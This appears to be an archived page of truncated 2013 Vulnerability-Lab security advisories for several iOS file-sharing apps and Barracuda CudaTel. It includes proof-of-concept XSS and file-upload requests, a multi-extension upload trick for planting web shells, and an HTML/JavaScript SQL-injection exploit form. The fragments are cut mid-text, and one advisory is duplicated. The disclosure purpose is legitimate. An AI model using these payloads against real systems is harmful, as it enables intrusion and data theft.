[+] Olive File Manager v1.0.1 - ITunes or 
AppStore (Apple)

Vulnerable Module(s):
[+] Add Folder

Vulnerable Parameter(s):
[+] foldername

Affected Module(s):
[+] Index Folder Listing 
(http://localhost:8797/)


Proof of Concept:
=
1.1
The file include and arbitrary file upload vulnerability can be exploited by 
remote attackers without privilege application user account 
and without required user interaction. For demonstration or reproduce ...

PoC: Filename

div class=file_list_containerdiv class=file_list_itemtable 
height=50px border=0 cellpadding=0 
cellspacing=0 width=100%tbodytrtd align=center valign=middle 
width=50/tdtd align=left 
valign=middle width=*a href=/a
/td/tr/tbody/table/divdiv class=file_list_itemtable 
height=50px border=0 cellpadding=0 
cellspacing=0 width=100%tbodytrtd align=center valign=middle 
width=50/tdtd align=left 
valign=middle width=*a href=[LOCAL FILE/PATH REQUEST!]/a

(Size:27,27 Kb, Last Modified:2013-07-12 18:34:15)br /
/td/tr/tbody/table/divdiv class=file_list_itemtable width=100% 
height=50px border=0 
cellpadding=0 cellspacing=0tbodytrtd width=50 align=center 
valign=middle/tdtd width=* 
align=left valign=middlea href=[LOCAL FILE/PATH REQUEST!]/a

(Size:27,27 Kb, Last Modified:2013-07-12 18:33:42)br /
/td/tr/tbody/table/div/div/divdiv class=footerdiv 
class=footer_textCopyright © 2008 OliveOffice,Inc.
/div/div/body/html/iframe/a/td/tr/tbody/table/div/div


--- POST Method Request Log ---

POST_DATA[-151253266715950
Content-Disposition: form-data; name=file; filename=[LOCAL FILE/PATH 
REQUEST!].png
Content-Type: image/png


1.2
the persistent input validation web vulnerability can be exploited by remote 
attackers without privilege application user account and
with low or medium required user interaction. For demonstration or reproduce ...

PoC: Foldername

div class=file_list_containerdiv class=file_list_itemtable 
height=50px border=0 cellpadding=0 
cellspacing=0 width=100%tbodytrtd align=center valign=middle 
width=50/tdtd align=left 
valign=middle width=*a href=/a
/td/tr/tbody/table/divdiv class=file_list_itemtable 
height=50px border=0 cellpadding=0 cellspacing=0 
width=100%tbodytrtd align=center valign=middle width=50/tdtd 
align=left valign=middle 
width=*a href=%20[PERSISTENT INJECTED SCRIPT CODE!] [PERSISTENT 
INJECTED SCRIPT CODE!]/%20
[PERSISTENT INJECTED SCRIPT CODE!]//a 
(Size:0 Kb, Last Modified:2013-07-12 18:26:31)br /
/td/tr/tbody/table/div/div/divdiv class=footerdiv 
class=footer_textCopyright © 2008 OliveOffice,Inc.
/div/div/body/html/iframe/a/td/tr/tbody/table/div/div


Solution:
=
1.1
The arbitrary file upload web vulnerability and the upload filter bypass issue 
is estimated as high(+).

1.2
The security risk of the persistent input validation vulnerabilities is 
estimated as high(-).


Risk:
=
The security risk of the persistent input validation web vulnerability is 
estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad

WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities

2013-07-18 Thread Vulnerability Lab

:
=
The vulnerability can be patched by a restriction of the json upload request 
and url parameter.
The POST request when processing to upload needs to be restricted, encoded and 
filtered.


Risk:
=
The security risk of the local file/path include  arbitrary file upload 
vulnerability is estimated as high.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.evolution-sec.com
Contact:ad...@vulnerability-lab.com - 
resea...@vulnerability-lab.com   - ad...@evolution-sec.com
Section:www.vulnerability-lab.com/dev   - forum.vulnerability-db.com
   - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
resea...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory 
[Evolution Security]







-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com

Flux Player v3.1.0 iOS - File Include Arbitrary File Upload Vulnerability

2013-07-18 Thread Vulnerability Lab

,application/xml;q=0.9,*/*;q=0.8]
  
Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
  DNT[1]
  
Referer[http://localhost:8080/]
  Connection[keep-alive]
   
Response Headers:
  Accept-Ranges[bytes]
  Content-Length[669]
  Date[Mo., 15 Jul 2013 20:05:02 GMT]



1.2
--- Request Session Log 2 - Arbitrary File Upload ---

Status: 200[OK]

POST http://localhost:8080/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[1053] 
Mime 

Type[application/x-unknown-content-type]
   Request Headers:
  Host[localhost:8080]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
 
Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
 DNT[1]
  
Referer[http://localhost:8080/]
  Connection[keep-alive]
   
Post Data:
  POST_DATA[-21961286324572
Content-Disposition: form-data; name=file; 
filename=schoko-drops-337.gif.html.php.js.jpg
Content-Type: image/png
---
Status: 200[OK]

GET http://localhost:8080/schoko-drops-337.gif.html.php.js.jpg  [Included 
File/Path as Filename!]
Load Flags[LOAD_DOCUMENT_URI  ] Content Size[669] Mime 
Type[application/x-unknown-

content-type]
   Request Headers:
  Host[localhost:8080]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept [text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  
Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
  DNT[1]
  
Referer[http://localhost:8080/]
  Connection[keep-alive]
   
Response Headers:
  Accept-Ranges[bytes]
  Content-Length[669]
  Date[Mo., 15 Jul 2013 20:05:05 GMT]




Note: 
After the upload of the manipulated malicious file (shell or web-shell), the 
remote attacker is able to access the 
full files by a delete of the image file extension. Its also possible to upload 
a file with multiple file extensions 
and to access with another frame.



PoC:

htmlheadtitleFiles from /titlestylehtml {background-color:#ee} 
body 
{ background-color:#FF; font-family:Tahoma,Arial,Helvetica,sans-serif; font-

size:18x; margin-left:15%; margin-right:15%; border:3px groove #006600; 
padding:15px; } /style/head
bodyh1Files from /h1bqThe following files are hosted 

live from the strongiPhone's/strong Docs folder./bqpa 
href=/abr
a href=.DownloadStatus.DownloadStatus/a   ( 0.0 Kb, 
(null))br
a href=.mpdrm.mpdrm/a ( 0.0 Kb, (null))br
a href=iframe src=a_[File Include/Arbitrary File Upload 
Vulnerability!]/a(0.0 Kb, (null))br /
a href=BKM337/a ( 0.0 Kb, (null))br /
a href=Rem0veRem0ve/a   ( 0.0 Kb, (null))br /
a href=a2b642e7de.jpga2b642e7de.jpg/a ( 0.0 Kb, 
(null))br /
/pform action= method=post enctype=multipart/form-data name=form1 
id=form1labelupload file
input type=file name=file id=file //labellabelinput type=submit 
name=button id=button 
value=Submit //label/form/body/html/iframe/a/p/body/html

Note: 
To exploit the issue the attacker needs to bypass the validation by an inject 
of 2 different scripts (tags).
After the upload the local file or path gets executed when processing to open 
the item listing.


Solution:
=
1.1
The vulnerability can be patched by a secure parse of the filenames when 
processing to upload via POST method request.
Encode and parse the filename output listing in the index site of the 
application. Restrict the filename name input and disallow special chars.

1.2
Restrict the input of the filenames when processing to upload a file with 
multiple extension. 
Encode and parse the filename output listing in the index site of the 
application. Restrict the filename name input and disallow special chars.
Disallow to open urls with multiple file extensions to prevent execution or 
access to web-shells.



Risk:
=
1.1
The security risk of the local file include web vulnerability is estimated as 
high.

1.2
The security risk of the arbitrary file upload vulnerability is estimated as 
high(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do

Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities (Bug Bounty #17)

2013-07-18 Thread Vulnerability Lab

bbx_outbound_route_name: [CLIENT-SIDE SCRIPT CODE!]
bbx_outbound_route_regex: ^\\d{10}$
bbx_outbound_route_type: national
/pre/body/html/iframe#8203;#8203;#8203;#8203;#8203;/pre


PoC:
http://cudatel.127.0.0.1:1338/gui/route/route?%3C[CLIENT-SIDE SCRIPT 
CODE!]%20%3C
http://cudatel.127.0.0.1:1338/gui/route/route?_=1354073910062bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE
 SCRIPT CODE!]%20%3C



1.2
Review: AJAX - HTML  queues_wall_stub - Monitor Queue Link  ops 
opOpenQueueWallboard

h3Queue Monitor a class=ops opOpenQueueWallboard href=#Large View in 
New Window/a/h3

PoC:
http://cudatel.127.0.0.1:1338/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE
 SCRIPT CODE!]%20%3C#



1.3
Review: Eventlog  eventlog - Web login attempt fail (Exception Handling) - 
Listing  bbx_eventlog_message
- 
bbx_eventlog_date_time: 2012-11-26 15:25:59
bbx_eventlog_email_sent: 0
bbx_eventlog_fullname: Admin
bbx_eventlog_id: 2823
bbx_eventlog_ip_addr: 178.200.236.201
bbx_eventlog_message: Web login attempt fail for 
[x]%20%20split%20%20[CLIENT-SIDE SCRIPT CODE!])  from 178.200.236.201
bbx_eventlog_priority: notice
bbx_eventlog_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) 
Gecko/17.0 Firefox/17.0
bbx_user_id: 1
  - 

PoC:
http://cudatel.127.0.0.1:1338/gui/eventlog/eventlog?%3Cx%3E%20%20%20%20%22%3E%3C[CLIENT-SIDE
 SCRIPT CODE!]%20%3C


Reference(s):
http://cudatel.ptest.cudasvc.com/gui/route/route
http://cudatel.ptest.cudasvc.com/ajax-html/queues_wall_stub.html
http://cudatel.ptest.cudasvc.com/gui/eventlog/eventlog


Risk:
=
The security risk of the (multiple) client side input validation 
vulnerabilities are estimated as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.evolution-sec.com
Contact:ad...@vulnerability-lab.com - 
resea...@vulnerability-lab.com   - ad...@evolution-sec.com
Section:www.vulnerability-lab.com/dev   - forum.vulnerability-db.com
   - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
resea...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory 
[Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com

Download Lite v4.3 iOS - Persistent File Web Vulnerability

2013-07-19 Thread Vulnerability Lab

 is processing to open the index listing.



Solution:
=
The vulnerability can be patched by a secure encoding and parse of the file 
name in the main file dir listing index module of the application.


Risk:
=
The security risk of the persistent input validation web vulnerability is 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.evolution-sec.com
Contact:ad...@vulnerability-lab.com - 
resea...@vulnerability-lab.com   - ad...@evolution-sec.com
Section:www.vulnerability-lab.com/dev   - forum.vulnerability-db.com
   - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
resea...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory 
[Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com

Barracuda LB, SVF, WAF WEF - Multiple Vulnerabilities

ExtpZnJhbWUgc3JjYSBvbmxvYWRhbGVydFZMICAxJTAjBgNVBAoTHGlmcmFtZSBz
cmNhIG9ubG9hZGFsZXJ0VkwgIDMxJTAjBgNVBAsTHGlmcmFtZSBzcmNhIG9ubG9h
ZGFsZXJ0VkwgIDQxJDAiBgNVBAMTG2lmcmFtZXNyY2FvbmxvYWRhbGVydHZsZ29h
bDEqMCgGCSqGSIb3DQEJARYbYWRtaW5AdnVsbmVyYWJpbGl0eS1sYWIuY29tggEA
MAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBABiGKfDora8sj8YWgnFb
WNyvnkaah5Ds21nFaN5I3ReSPLDGEAdRYSI3K9g9LjHLIkyUT2kDChLXPnm6Gbuu
BVGUKQpZV+ORbB5J1NvmFJlyCVU+3PmU5JFggmsuBRSI1sIsUvyVdRxeasnhlw7i
ZwtWAz1D13+zfb60QZc+Ekvn2d2RKFQ5eWxGrlEZ3niRjcO9Jr/HVE66HTzf6AUn
r1zcu/7IqNr9wI0I9cQx2lnR9GgpSP3gBH7F5SXw6b1dLvHVIgcnd62JzyJNrQ1B
dQYTStsbK710ik9OKq86j8tgQ9Q0TdLh7t9KncRmlZtxZSeYkzM9j1vdDpSrMMHU
3xU=
-END CERTIFICATE-


Solution:
=
The vulnerabilities can be patched by parsing the affected (displayed) 
certificate value(s) output listing.
Restrict and parse the input fields (function) of trusted and self signed 
certificates values to prevent future executions out of the certificate context.


Risk:
=
The security risk of the persistent input validation web vulnerabilities are 
estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.evolution-sec.com
Contact:ad...@vulnerability-lab.com - 
resea...@vulnerability-lab.com   - ad...@evolution-sec.com
Section:www.vulnerability-lab.com/dev   - forum.vulnerability-db.com
   - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
resea...@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory 
[Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com

Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability

 interaction.
For demonstration or reproduce ...

Standard Request: Row 100
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509since=1+daysearch_string=rows=100page=1sortby=end_timestampsortorder=desc

Standard Request: Output
--- 1.
{count:0,page:1,cdr:[],rows:100}


Manipulated Request: 
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
_=1353973149509since=1+daysearch_string=rows=100page='1+1%27[SQL-Injection!]%27--sortby=end_timestampsortorder=desc
... or
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
%20%20_=1353973149509since=1+daysearch_string=page='1335page='1336page='1337rows='1+1%27[SQL-Injection!]%27--page=1sortby=end_timestampsortorder=desc


Manipulated Output:
--- 1.

cdr: []

count: 0
page: 1
rows: 1+2


--- 1.
cdr: []

count: 1+2'
page: 
  - '1335
  - '1336
  - '1337
  - '1
rows: -1+1'[SQL-Injection!]'--


Exploit (PoC):

htmlheadbodymeta http-equiv=Content-Type content=text/html; 
charset=iso-8859-9
titleBarracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection 
[PROOF OF CONCEPT]/title
script language=JavaScript
var path=/gui/cdr/cdr
var 
adres=?%20%20_=1353973149509since=1+daysearch_string=page='1335page='1336page='1337rows=
var domain =http://cudatel.127.0.0.1:1337;
var sql = '1+1%27[SQL-Injection!]%27--  
function command(){
if (document.rfi.target1.value==){
alert(NOPE!);
return false;
}  
rfi.action= document.rfi.target1.value+path+adres+domain+sql;
rfi.submit();
}
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Barracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection Exploit
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Vulnerability Research Laboratory (www.vulnerability-lab.com)
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD.  Stealthwalker
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/script/headbody bgcolor=#00 link=#99
centerp align=centerbfont face=Verdana size=2 
color=#006633Barracuda Networks CudaTel [CDR] (ROWPAGE) 
- Remote SQL-Injection Exploit/font
/b/pform method=post target=getting name=rfi 
onSubmit=command();div align=left
pbfont face=Arial size=2 color=#006633VICTIM:/font/b
input type=text name=target1 size=53 style=background-color: #006633 
onMouseOver=javascript:this.style.background='#808080'; 
onMouseOut=javascript:this.style.background='#808000';/p
pbfont face=Arial size=2 color=#006633EXAMPLE:/fontfont 
face=Arial size=2 color=#808080  
HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]//font/b/p/div
p align=leftinput type=submit value=Execute INPUT name=B1
/pp align=leftinput type=reset value=Clear ALL 
name=B2/p/formpbr
iframe name=getting height=337 width=633 scrolling=yes 
frameborder=0/iframe/pdiv align=left
  p align=centerbfont face=Verdana size=2 
color=#008000VULNERABILITY-LAB a 
href=mailto:resea...@vulnerability-lab.com;
BKM/a/font/b/p/div/center/body/html


1.2
The client side input validation vulnerability can be exploited by remote 
attackers without application user account and with medium required user 
interaction.
For demonstration or reproduce ...

PoC:
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509since=1+daysearch_string=rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]page=1sortby=end_timestampsortorder=desc

http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509since=1+daysearch_string=rows=100page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]sortby=end_timestampsortorder=desc

Note: We only verified the bug with the same exception in a not parsed 
parameter but the bug itself is located in all areas of the invalid exception.


Solution:
=
1.1
To patch the sql injection it is required to parse the row and page parameters 
in the cdr module.

1.2
To fix the client side xss vulnerability parse by encoding the row parameter 
and restrict the input.
Encode the affected exception-handling output listing when processing to 
display invalid input values.

Note: Barracuda Networks provided an update of version 2.6.002.040 to 
v2.6.003.x to all clients and customers in the bn customer area.


Risk:
=
1.1
The security risk of the remote sql injection web vulnerability  is estimated 
critical.

1.2
The security risk of the client side input validation web vulnerability is 
estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even

Barracuda CudaTel 2.6.02.040 - SQL Injection Vulnerability

 interaction.
For demonstration or reproduce ...

Standard Request: Row 100
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509since=1+daysearch_string=rows=100page=1sortby=end_timestampsortorder=desc

Standard Request: Output
--- 1.
{count:0,page:1,cdr:[],rows:100}


Manipulated Request: 
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
_=1353973149509since=1+daysearch_string=rows=100page='1+1%27[SQL-Injection!]%27--sortby=end_timestampsortorder=desc
... or
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
%20%20_=1353973149509since=1+daysearch_string=page='1335page='1336page='1337rows='1+1%27[SQL-Injection!]%27--page=1sortby=end_timestampsortorder=desc


Manipulated Output:
--- 1.

cdr: []

count: 0
page: 1
rows: 1+2


--- 1.
cdr: []

count: 1+2'
page: 
  - '1335
  - '1336
  - '1337
  - '1
rows: -1+1'[SQL-Injection!]'--


Exploit (PoC):

htmlheadbodymeta http-equiv=Content-Type content=text/html; 
charset=iso-8859-9
titleBarracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection 
[PROOF OF CONCEPT]/title
script language=JavaScript
var path=/gui/cdr/cdr
var 
adres=?%20%20_=1353973149509since=1+daysearch_string=page='1335page='1336page='1337rows=
var domain =http://cudatel.127.0.0.1:1337;
var sql = '1+1%27[SQL-Injection!]%27--  
function command(){
if (document.rfi.target1.value==){
alert(NOPE!);
return false;
}  
rfi.action= document.rfi.target1.value+path+adres+domain+sql;
rfi.submit();
}
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Barracuda Networks CudaTel [CDR] (ROWPAGE) - Remote SQL-Injection Exploit
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Vulnerability Research Laboratory (www.vulnerability-lab.com)
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD.  Stealthwalker
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/script/headbody bgcolor=#00 link=#99
centerp align=centerbfont face=Verdana size=2 
color=#006633Barracuda Networks CudaTel [CDR] (ROWPAGE) 
- Remote SQL-Injection Exploit/font
/b/pform method=post target=getting name=rfi 
onSubmit=command();div align=left
pbfont face=Arial size=2 color=#006633VICTIM:/font/b
input type=text name=target1 size=53 style=background-color: #006633 
onMouseOver=javascript:this.style.background='#808080'; 
onMouseOut=javascript:this.style.background='#808000';/p
pbfont face=Arial size=2 color=#006633EXAMPLE:/fontfont 
face=Arial size=2 color=#808080  
HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]//font/b/p/div
p align=leftinput type=submit value=Execute INPUT name=B1
/pp align=leftinput type=reset value=Clear ALL 
name=B2/p/formpbr
iframe name=getting height=337 width=633 scrolling=yes 
frameborder=0/iframe/pdiv align=left
  p align=centerbfont face=Verdana size=2 
color=#008000VULNERABILITY-LAB a 
href=mailto:resea...@vulnerability-lab.com;
BKM/a/font/b/p/div/center/body/html


1.2
The client side input validation vulnerability can be exploited by remote 
attackers without application user account and with medium required user 
interaction.
For demonstration or reproduce ...

PoC:
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509since=1+daysearch_string=rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]page=1sortby=end_timestampsortorder=desc

http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509since=1+daysearch_string=rows=100page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]sortby=end_timestampsortorder=desc

Note: We only verified the bug with the same exception in a not parsed 
parameter but the bug itself is located in all areas of the invalid exception.


Solution:
=
1.1
To patch the sql injection it is required to parse the row and page parameters 
in the cdr module.

1.2
To fix the client side xss vulnerability parse by encoding the row parameter 
and restrict the input.
Encode the affected exception-handling output listing when processing to 
display invalid input values.

Note: Barracuda Networks provided an update of version 2.6.002.040 to 
v2.6.003.x to all clients and customers in the bn customer area.


Risk:
=
1.1
The security risk of the remote sql injection web vulnerability  is estimated 
critical.

1.2
The security risk of the client side input validation web vulnerability is 
estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability

Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities